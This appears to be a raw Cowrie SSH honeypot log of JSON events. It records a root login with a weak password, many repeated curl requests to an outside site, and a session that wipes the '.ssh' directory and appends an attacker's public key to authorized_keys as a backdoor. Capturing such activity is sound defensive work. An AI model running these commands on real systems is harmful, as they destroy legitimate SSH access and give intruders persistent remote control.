{"eventid":"cowrie.login.success","username":"root","password":"wise","message":"login attempt [root/wise] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.840754Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.860355Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.861058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.899623Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.900384Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:14.981063Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:14.981838Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.053102Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.053891Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.094518Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.095324Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.135124Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.135962Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.177346Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.178160Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.249891Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.250769Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.331815Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.332703Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.389208Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.390108Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.428318Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.429193Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.469079Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.469891Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.513870Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.515065Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.555601Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.556546Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.595909Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.596868Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.635843Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.637622Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.674977Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.675802Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.759875Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.760678Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.877031Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.877805Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.915016Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.915998Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:15.961792Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:15.962610Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.032186Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.033008Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.093410Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.094229Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.153467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.154309Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.218991Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.219793Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.256794Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.257549Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.295501Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.296444Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.348022Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.349123Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.389837Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.390891Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.430822Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.431710Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.469347Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.470248Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.574101Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.574964Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.630964Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.631907Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.700120Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.700892Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.737944Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.738764Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.775942Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.776802Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.821222Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.821966Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.899342Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.900161Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.936984Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.938025Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:16.975665Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:16.976502Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.066338Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.067260Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.208157Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.209132Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.246536Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.247691Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.284589Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.285398Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.719946Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.720737Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.721834Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.727533Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.728127Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.775164Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.776168Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.823627Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.824459Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.884325Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.885216Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.935354Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.937012Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.937583Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.956331Z","src_ip":"139.19.117.131","session":"20110760a278"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:17.993331Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:17.994378Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.071424Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.072487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.158923Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.159708Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.370783Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.371623Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.451191Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.452087Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.527425Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.528263Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:18.574015Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.575184Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:47:18.581165Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
